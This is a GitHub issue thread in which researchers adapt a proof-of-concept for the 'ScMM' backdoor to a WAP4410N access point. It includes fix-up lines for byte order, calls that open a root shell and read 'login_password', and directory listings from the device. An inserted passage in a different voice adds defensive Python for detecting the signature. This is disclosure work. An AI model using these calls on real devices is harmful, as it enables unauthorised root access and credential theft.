WAP4410N #11

Closed
Matthew1471 opened this issue Jan 2, 2014 · 25 comments

Comments

@Matthew1471

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02
Software Version: 2.0.6.1

@elvanderb
Owner

strange... I'll investigate :)
Is there any error/message?

@Matthew1471
Author

I have a PCAP if you want me to e-mail it?

Edit: Actually uploaded it here : http://filebin.ca/17UJu55XztDv/Capture.pcapng

@elvanderb
Owner

no, thank you, I'll search the firmware.

@Matthew1471
Author

Okay thanks :-). Let me know if I can help.

@elvanderb
Owner

The binary in your firmware has all the symbols :) nice
I had a quick look at your version of scfgmgr and it seems to work like the WAG200G one (even if the code is a little bit different).
I'll soon update my code to add the shell could you please test it on your router when it'll be up?

@Matthew1471
Author

Certainly will, thanks! Let me know when it's up.

@elvanderb
Owner

updated, could you test it and paste the result?

@elvanderb
Owner

you can also try some commands like 'ps'

@Matthew1471
Author

backdoorolol.py

Traceback (most recent call last):
  File "backdoorolol.py", line 41, in <module>
    print send_message(s, 7, 'echo "welcome, here is a root shell, have fun"')[1]
  File "backdoorolol.py", line 19, in send_message
    assert(sig == 0x53634D4D)
AssertionError

@Matthew1471
Author

I added:
print hex(sig)

and got:
0x4d4d6353

Which is backwards... So, endian?

@elvanderb
Owner

Yep :)
You're right :)
Your router is big endian, mine is little endian.
This backdoor is really badly coded :D
I'll add some code to detect that, thank you very much for taking the time to report this :)

@elvanderb
Owner

Could you test the last version please?

@Matthew1471
Author

Needed a bug fix to this line:
elif sig == 0X4D4D6353 :

However it now works! CONFIRMED!

Thank you very much for your time and patience :)
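The byte-order mix-up discussed in the two comments above (the signature reads 0x53634D4D on a little-endian device and 0x4D4D6353 on a big-endian one) is also what a defender has to get right when scanning their own network for this service: a check that only compares against one byte order misses half the affected devices. The following is an added example, not code from the PoC or from anyone in this thread. It assumes the response header is three 32-bit words (signature, command number, payload length) followed by the payload; that layout is an assumption here, not something the issue states, and the sample responses are constructed, not captured traffic.

```python
import struct

# Signature value as the PoC asserts on it; the byte order it is written in
# is what differs between devices (little-endian on the WAG200G in this
# thread, big-endian on the WAP4410N).
SIGNATURE = 0x53634D4D
# Assumed header layout: signature, command, payload length (3 x uint32).
HEADER_LEN = 12


def detect_byte_order(data):
    """Return '<' (little-endian) or '>' (big-endian) if the first four bytes
    of `data` are the signature in that byte order, else None."""
    if len(data) < 4:
        return None
    for order in ('<', '>'):
        if struct.unpack(order + 'I', data[:4])[0] == SIGNATURE:
            return order
    return None


def parse_header(data):
    """Parse a response, choosing the byte order from the signature.

    Returns (byte_order, command, payload_length, payload), or None when the
    signature is absent or the advertised length does not match the bytes
    actually present (a malformed or truncated response is reported rather
    than silently accepted).
    """
    order = detect_byte_order(data)
    if order is None or len(data) < HEADER_LEN:
        return None
    _sig, cmd, length = struct.unpack(order + 'III', data[:HEADER_LEN])
    payload = data[HEADER_LEN:]
    if length != len(payload):
        return None
    return order, cmd, length, payload


def build_sample(order, cmd, payload):
    """Construct a sample response in the given byte order (test data only)."""
    return struct.pack(order + 'III', SIGNATURE, cmd, len(payload)) + payload


# Constructed samples: the same logical header emitted by each byte order.
SAMPLE_LE = build_sample('<', 7, b'ok\n')   # starts with b'MMcS'
SAMPLE_BE = build_sample('>', 7, b'ok\n')   # starts with b'ScMM'

if __name__ == '__main__':
    for name, sample in (('little-endian', SAMPLE_LE), ('big-endian', SAMPLE_BE)):
        print(name, sample[:4], parse_header(sample))
```

The point of trying both unpackings is that the same four bytes on the wire spell "MMcS" from a little-endian device and "ScMM" from a big-endian one, which is exactly why the original assertion failed on the WAP4410N; a scanner or IDS rule that matches only one spelling will under-report.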

@elvanderb
Owner

Oh yes, my bad :)
you are welcome, thank you for your testing and report :)

@Matthew1471
Author

No, thank you :-)

Can you see from the firmware if there's a similar getvar function like with yours?

@elvanderb
Owner

you can use command 1 to dump all the available variables, command numbers are the same :)
command to use to dump all the vars:
send_message(s, endianness, 1) # dump all the variables

If I wasn't lazy I would code a real PoC with command line parameters :D

@Matthew1471
Author

Ah I kept trying with 2 and forgot about 1.

For 2 on this model it needs to be:
print send_message(s, endianness, 2, "login_password")[1]

The backdoor seems a bit unstable: if you try executing something it doesn't like, it disconnects you, and I don't seem to be able to close my connections properly (I managed to get it to refuse to let me connect until I rebooted the AP).

Here's the contents of /bin/

ls /bin/ -l
lrwxrwxrwx 1 0 0 7 watch -> busybox
lrwxrwxrwx 1 0 0 7 vi -> busybox
lrwxrwxrwx 1 0 0 7 umount -> busybox
lrwxrwxrwx 1 0 0 7 touch -> busybox
lrwxrwxrwx 1 0 0 7 sleep -> busybox
lrwxrwxrwx 1 0 0 7 sh -> busybox
lrwxrwxrwx 1 0 0 7 sed -> busybox
lrwxrwxrwx 1 0 0 7 rm -> busybox
lrwxrwxrwx 1 0 0 7 pwd -> busybox
lrwxrwxrwx 1 0 0 7 ps -> busybox
lrwxrwxrwx 1 0 0 7 ping6 -> busybox
lrwxrwxrwx 1 0 0 7 ping2file -> busybox
lrwxrwxrwx 1 0 0 7 ping -> busybox
lrwxrwxrwx 1 0 0 7 mv -> busybox
lrwxrwxrwx 1 0 0 7 mount -> busybox
lrwxrwxrwx 1 0 0 7 mkdir -> busybox
lrwxrwxrwx 1 0 0 7 ls -> busybox
lrwxrwxrwx 1 0 0 7 login -> busybox
lrwxrwxrwx 1 0 0 7 ln -> busybox
lrwxrwxrwx 1 0 0 7 kill -> busybox
lrwxrwxrwx 1 0 0 7 hostname -> busybox
lrwxrwxrwx 1 0 0 7 grep -> busybox
lrwxrwxrwx 1 0 0 7 fgrep -> busybox
lrwxrwxrwx 1 0 0 7 egrep -> busybox
lrwxrwxrwx 1 0 0 7 echo -> busybox
lrwxrwxrwx 1 0 0 7 dmesg -> busybox
lrwxrwxrwx 1 0 0 7 df -> busybox
lrwxrwxrwx 1 0 0 7 date -> busybox
lrwxrwxrwx 1 0 0 7 cp -> busybox
lrwxrwxrwx 1 0 0 7 chmod -> busybox
lrwxrwxrwx 1 0 0 7 cat -> busybox
-rwxr-xr-x 1 0 0 526260 busybox
lrwxrwxrwx 1 0 0 7 ash -> busybox

and the supported features of busybox:

busybox
BusyBox v1.1.0 (2011.10.27-14:28+0000) multi-call binary

Usage: busybox [function] [arguments]...
or: [function] [arguments]...

    BusyBox is a multi-call binary that combines many common Unix
    utilities into a single executable.  Most people will create a
    link to busybox for each function they wish to use and BusyBox
    will act like whatever it was invoked as!

Currently defined functions:
[, [[, ash, brctl, busybox, cat, chmod, cp, cut, date, df, dmesg,
echo, egrep, fgrep, free, ftpget, ftpput, grep, hostname, ifconfig,
init, insmod, kill, killall, ln, login, ls, lsmod, mkdir, mount,
mv, passwd, ping, ping2file, ping6, ps, pwd, reboot, rm, rmmod,
route, sed, sh, sleep, tail, telnetd, test, tftp, top, touch,
umount, vi, watch, which, xargs

@elvanderb
Owner

Nice, thank you :)
I'm updating the PoC to make it a little bit more user friendly ;)

@Matthew1471
Author

Just tried the new version, works well. Thanks for researching this and helping to make the product safer!

Just wondering but given our endian discovery, your list of "Backdoor is not working in", do these need to be re-checked with the new code?

@elvanderb
Owner

I don't think so, people reported routers with closed ports.
Thank you for your testing :) I just updated to a new version that fixes some bugs

@Matthew1471
Author

Thanks.

Minor thing, WAP4410N is a Cisco product, not Linksys: http://www.cisco.com/en/US/prod/collateral/wireless/ps5678/ps10047/ps10052/data_sheet_c78-501860.html

@elvanderb
Owner

woops, fixed :)

@avsavchenko

Doesn't work with new firmware 2.0.7.4

@an3k

an3k commented Jan 24, 2014

WAP4410N (also known as WAP4410N-E, it's the same device) Hardware Revision 01 and 02 are Linksys (in fact "Linksys by Cisco") products, Rev 03 is pure Cisco.

Linksys was never a company on its own. It was just a "brand" name Cisco used for their SOHO products.

@gpread

gpread commented Sep 17, 2022

Listens to port and responds to data with "ScMM" but your Python script doesn't work in its current form.

PID VID: WAP4410N-E V02 Software Version: 2.0.6.1

Hi, @Matthew1471

I am looking for a 2.0.6.1 or newer firmware image file for a WAP4410N-E V02 that I have. Cisco made this device unsupported in 2019 and so I am unable to find one through an official channel. Any chance that you have it, and can upload it somewhere that I could download from, so I can update my device? Thanks in advance, Gavin
